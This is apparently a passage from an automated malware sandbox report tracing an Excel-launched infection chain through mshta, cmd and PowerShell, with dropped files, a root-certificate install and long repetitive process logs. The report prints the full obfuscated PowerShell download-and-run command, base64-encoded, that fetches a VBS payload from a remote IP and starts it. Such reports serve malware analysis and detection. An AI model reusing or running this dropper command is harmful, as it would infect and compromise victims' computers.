Oi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
          Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"Jump to behavior
          Suspicious powershell command line found
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899C022D push eax; iretd 7_2_000007FE899C0241
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899C00BD pushad ; iretd 7_2_000007FE899C00C1
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeCode function: 12_2_000007FE8B6500BD pushad ; iretd 12_2_000007FE8B6500C1
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeCode function: 12_2_000007FE8B6500CD pushad ; iretd 12_2_000007FE8B6500C1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00407041 push cs; iretd 13_2_00407042
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0041705E push edi; iretd 13_2_00417060
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004030F0 push eax; ret 13_2_004030F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0041C8FC push cs; iretd 13_2_0041C8C9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00401949 push 63DCA26Ah; ret 13_2_0040194E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040214B push edx; retf 13_2_0040214E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402101 push ebp; iretd 13_2_0040210D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040210E push eax; retf 13_2_0040214A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004021A4 push eax; retf 13_2_0040214A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0041125B pushfd ; ret 13_2_0041125E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004242D9 push esp; ret 13_2_00424330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004242E3 push esp; ret 13_2_00424330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00401AB8 push edx; retf 13_2_00401AE3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00413416 push ecx; iretd 13_2_00413417
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0041ECDC push ds; iretd 13_2_0041ECDD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00401DF5 push ebp; iretd 13_2_00401DB2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00401DA6 push ebp; iretd 13_2_00401DB2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00416EAA push esp; retf 13_2_00416EAB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00401F0D push eax; retf 13_2_00401F19
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00401FEB push edx; retf 13_2_00401FEC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00410FEE push ebp; iretd 13_2_00411000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00410FF3 push ebp; iretd 13_2_00411000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00401FA4 push edx; ret 13_2_00401FAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00401FBA push 0000006Ah; iretd 13_2_00401FC6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A6DFA1 push ecx; ret 13_2_00A6DFB4
          Source: temp_exec.exe.11.drStatic PE information: section name: .text entropy: 7.96543242796983

          Persistence and Installation Behavior

          barindex
          Installs new ROOT certificates
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\temp_exec.exeJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
